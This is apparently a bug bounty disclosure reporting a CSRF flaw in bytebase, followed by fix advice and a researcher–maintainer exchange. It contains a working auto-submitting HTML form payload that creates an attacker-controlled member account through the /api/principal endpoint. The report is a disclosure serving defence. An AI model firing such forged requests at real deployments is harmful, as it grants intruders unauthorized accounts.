Cross-Site Request Forgery (CSRF) in bytebase/bytebase

Valid

Reported on

Oct 13th 2021


Description

all part of application That use POST http method to change or create data are vulnerable to CSRF attacks.( for example the PATCH methods are not vulnerable)

I will show just create a member POC for you and if you want to see other POCs of other endpoint just say me to provide them too( I thought don't need to more POC)

1.Open the PoC.html file

2.After that you open the PoC.html a request will be sent to http://YOURSERVER:5678/api/principal endpoint.

  1. after that you can see that attacker create a Dev member named attacker with email attacker@mail.com that already have the credentials of new user.
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURSERVER:5678/api/principal" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;data&quot;&#58;&#123;&quot;type&quot;&#58;&quot;PrincipalCreate&quot;&#44;&quot;attributes&quot;&#58;&#123;&quot;name&quot;&#58;&quot;attacker&quot;&#44;&quot;email&quot;&#58;&quot;attacker&#64;mail&#46;com&quot;&#44;&quot;password&quot;&#58;&quot;VGS86VrDTMAOUYP0&quot;&#125;&#125;&#44;&#13;&#10;&quot;test&quot;&#58;&quot;" value="&quot;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

The impact of this CSRF is high.

#Fix suggestion

set SameSite flag for all cookies to Strict Or Lax

Or the better way is that create a CSRF token for each request.

We have contacted a member of the bytebase team and are waiting to hear back 2 months ago
bytebase/bytebase maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
bytebase/bytebase maintainer confirmed that a fix has been merged on fd1d92 2 months ago
The fix bounty has been dropped
amammad
2 months ago

Researcher


hey bytebase team, can i ask you to tell me why delete the other occurrences?

amammad
2 months ago

Researcher


there are many CSRFs exist in bytebase and I found all of them, if you make a one fix for all that doesn't mean there is only one occurrence(according to other bug bounty programs that i see) please let me know and if you agree i report them again.

amammad
a month ago

Researcher


Hey ByteBase team

Any feedback?